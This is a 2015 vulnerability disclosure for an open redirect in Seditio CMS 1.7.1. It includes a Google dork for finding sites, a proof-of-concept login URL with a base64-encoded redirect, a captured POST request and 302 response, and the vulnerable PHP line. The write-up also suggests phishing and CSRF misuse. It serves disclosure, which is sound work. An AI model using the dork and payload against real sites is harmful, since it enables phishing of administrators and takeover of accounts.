Seditio CMS 1.7.1 Open Redirect
Posted on 28 July 2015
[+] Exploit Title: Seditio CMS Open Redirect [+] Google Dork: intext:"Powered by Seditio CMS" [+] Date: 27/7/2015 [+] Exploit Author: Arash Khazaei [+] Vendor Homepage: http://www.seditiocms.com/ [+] Software Link: http://www.seditiocms.com/page.php?id=20&a=dl [+] Version: 1.7.1(Last Version) [+] Tested on: Kali , Windows [+] CVE : N/A ====================================================== [+] introduction: [+] an open redirect Vulnerability In Admin Login Page Harmed The Cms . [+] And Can Used For Bypass CSRF For Changing Admin Password , Phishing and ... . ====================================================== [+] Poc: [+] For Exploiting This Vulnerability We Need encode Our ULR To Base64 . [+] Our URL : Google = aHR0cDovL2dvb2dsZS5jb20= . ===================== [+] Defualt Redirect Page Is /admin.php This Mean After Admin Logged In Will Be Redirected To /admin.php Page . [+] Default Url : http://localhost/users.php?m=auth&redirect=L2FkbWluLnBocA== [+] if we change encoded url with Our Encoded URL Admin After Login Will Be Ridirected To GOogle.com [+] Our Url : http://localhost/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20= [+] Result : [+] http://localhost/sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20= [+] POST /sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20= HTTP/1.1 [+] Host: localhost [+] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 [+] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 [+] Accept-Language: en-US,en;q=0.5 [+] Accept-Encoding: gzip, deflate [+] Referer: http://localhost/sido/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20= [+] Cookie: SEDITIO=MDpfOjA6XzpzcGVjaWFs; KCFINDER_showname=on; KCFINDER_showsize=on; KCFINDER_showtime=on; KCFINDER_order=type; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on; timezoneOffset=16200,0; __utma=111872281.449674650.1437406401.1437406401.1437406401.1; __utmz=111872281.1437406401.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=97amucvohmev2ltkkmhi9jl9e3 [+] Connection: keep-alive [+] Content-Type: application/x-www-form-urlencoded [+] Content-Length: 64 [+] rusername=admin&rpassword=admin1&rcookiettl=0&x=97AMUCVOHMEV2LTK [+] HTTP/1.1 302 Found [+] Date: Mon, 27 Jul 2015 17:45:08 GMT [+] Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15 [+] X-Powered-By: PHP/5.5.15 [+] Expires: Thu, 19 Nov 1981 08:52:00 GMT [+] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 [+] Pragma: no-cache [+] Location: message.php?msg=104&redirect=aHR0cDovL2dvb2dsZS5jb20= [+] Content-Encoding: gzip [+] Vary: Accept-Encoding [+] Content-Length: 20 [+] Keep-Alive: timeout=5, max=100 [+] Connection: Keep-Alive [+] Content-Type: text/html [+] You Can See HTTP 302 Found And Redirected . To Google . Vulnerable Code In /system/core/users/user.auth.php $t->assign(array( "USERS_AUTH_TITLE" => $L['aut_logintitle'], Vulnerable -> "USERS_AUTH_SEND" => "users.php?m=auth&a=check&redirect=".$redirect, Discovered By : Arash Khazaei